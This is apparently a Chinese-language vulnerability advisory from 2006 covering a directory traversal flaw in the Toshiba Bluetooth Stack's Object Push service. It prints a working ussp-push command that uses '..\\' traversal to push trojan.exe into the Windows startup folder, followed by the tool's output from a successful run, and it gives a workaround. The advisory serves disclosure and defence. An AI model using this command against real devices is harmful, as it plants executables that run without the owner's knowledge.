发布日期：2006-01-13
更新日期：2006-01-13

受影响系统：

Toshiba Bluetooth Stack 4.x
Toshiba Bluetooth Stack 4.0.11 (for Dell)
Toshiba Bluetooth Stack 3.x

描述：

---

BUGTRAQ  ID: 16236

Toshiba蓝牙栈是东芝公司提供的蓝牙PC栈，支持v1.2规范。

Toshiba蓝牙栈的Object Push服务中存在目录遍历漏洞，远程攻击可上传文件到任意可写目录。

用户如果接受了连接请求提示的话，会要求指定文件下载位置。无论用户指定了什么路径，攻击者都可以将文件上传至任何可写的位置。在连接期间，不会出现文件名，因此受害用户不会知道正在发生的攻击。

<*来源：Kevin Finisterre （dotslash@snosoft.com）
  
  链接：http://www.digitalmunition.com/DMA%5B2006-0112a%5D.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

animosity:/home/kfinisterre/ussp-push-0.5# ./ussp-push
00:11:B1:07:BE:A7@4 trojan.exe ..\\..\\..\\..\\..\\windows\\startup\\pwned.exe
pushing file trojan.exe
name=trojan.exe, size=18009
Registered transport

set user data

created new objext
Local device 00:0A:3A:54:71:95
Remote device 00:11:B1:07:BE:A7 (4)

started a new request
reqdone
Command (00) has now finished, rsp: 20Connected!

Connection return code: 0, id: 0
Connection established
connected to server
Sending file: ..\..\..\..\..\windows\startup\pwned.exe, path: trojan.exe, size: 18009
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
Made some progress...
reqdone
Command (02) has now finished, rsp: 20reqdone
Command (01) has now finished, rsp: 20Disconnect done!pushed!!

建议：

---

临时解决方法：

* 不要接受不可信任来源的连接请求。

厂商补丁：

Toshiba
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.toshiba.com/

浏览次数：2753
严重程度：0（网友投票）